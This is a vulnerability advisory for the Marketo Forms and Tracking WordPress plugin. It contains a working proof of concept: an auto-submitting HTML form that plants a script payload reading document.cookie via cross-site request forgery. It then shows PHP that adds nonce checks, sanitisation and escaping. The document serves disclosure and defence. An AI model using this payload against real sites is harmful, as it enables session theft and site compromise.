WPEX-ID: 4D885F55-6FE3-4353-9DF4-C7BA232981D0
Source: wpvulndb
Published: Jan 17, 2020

Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS


EPSS: 0.003 (Low), percentile 70.0%

Lack of CSRF checks and sanitisation on the plugin’s settings page could allow XSS attacks via CSRF.

<html>
<form action="https://[WP]/wp-admin/admin.php?page=marketo_fat" method="POST" id="csrf">
    <input type="text" name="marketo_save" value="true">
    <input type="text" name="marketo[marketo_id]" value="&#x22;&#x3E;&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;">
    <input type="text" name="marketo[marketo_base_url]" value="">
    <input type="text" name="marketo[user_id]" value="">
    <input type="text" name="marketo[end_point]" value="">
    <input type="text" name="marketo[secret]" value="">
    <input type="text" name="marketo[popout_title]" value="">
    <input type="text" name="marketo[popout_tabtext]" value="">
    <input type="text" name="marketo[popout_snippet]" value="">
    <input type="text" name="marketo[popout_form]" value="">
</form>
<script>
    document.getElementById('csrf').submit();
</script>
</html>
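The two missing controls the advisory names, a nonce check and input sanitisation, plus output escaping, shown in a minimal WordPress settings handler. This is an added illustration, not the plugin's own code: the function names, the option name and the nonce action are assumptions, while the field names mirror the proof of concept above.

```php
<?php
// Added example, not code from the Marketo Forms and Tracking plugin.
// Hypothetical handler for the settings page targeted by the PoC.

function marketo_fat_handle_save_hardened() {
    if ( empty( $_POST['marketo_save'] ) ) {
        return; // nothing to save
    }
    // Settings changes should be limited to users who can manage options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // CSRF control: the nonce is tied to the logged-in user's session and only
    // appears in forms WordPress rendered for them, so a form hosted elsewhere
    // (as in the PoC) fails this check. Action/field names are assumptions.
    check_admin_referer( 'marketo_fat_save', 'marketo_fat_nonce' );

    $raw   = ( isset( $_POST['marketo'] ) && is_array( $_POST['marketo'] ) )
        ? wp_unslash( $_POST['marketo'] ) : array();
    $clean = array();

    // Input sanitisation: each known field is reduced to plain text; unknown
    // keys are dropped rather than stored.
    $text_fields = array( 'marketo_id', 'user_id', 'end_point', 'secret',
        'popout_title', 'popout_tabtext', 'popout_form' );
    foreach ( $text_fields as $key ) {
        $clean[ $key ] = sanitize_text_field( $raw[ $key ] ?? '' );
    }
    $clean['marketo_base_url'] = esc_url_raw( $raw['marketo_base_url'] ?? '' );
    $clean['popout_snippet']   = sanitize_textarea_field( $raw['popout_snippet'] ?? '' );

    update_option( 'marketo_fat_settings', $clean ); // option name is an assumption
}

function marketo_fat_render_form_hardened() {
    $opts = get_option( 'marketo_fat_settings', array() );
    echo '<form method="post">';
    // Emits the hidden nonce input that check_admin_referer() verifies.
    wp_nonce_field( 'marketo_fat_save', 'marketo_fat_nonce' );
    foreach ( array( 'marketo_id', 'marketo_base_url', 'user_id' ) as $key ) {
        // Output escaping: a stored value such as "><script>... is rendered as
        // attribute text, not markup, even if sanitisation was bypassed.
        printf( '<input type="text" name="marketo[%1$s]" value="%2$s">',
            esc_attr( $key ), esc_attr( $opts[ $key ] ?? '' ) );
    }
    echo '<input type="hidden" name="marketo_save" value="true">';
    submit_button();
    echo '</form>';
}
```

Each layer stands on its own: the nonce stops the cross-site submission, sanitisation limits what is stored, and esc_attr() keeps whatever is stored from executing in an administrator's browser.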

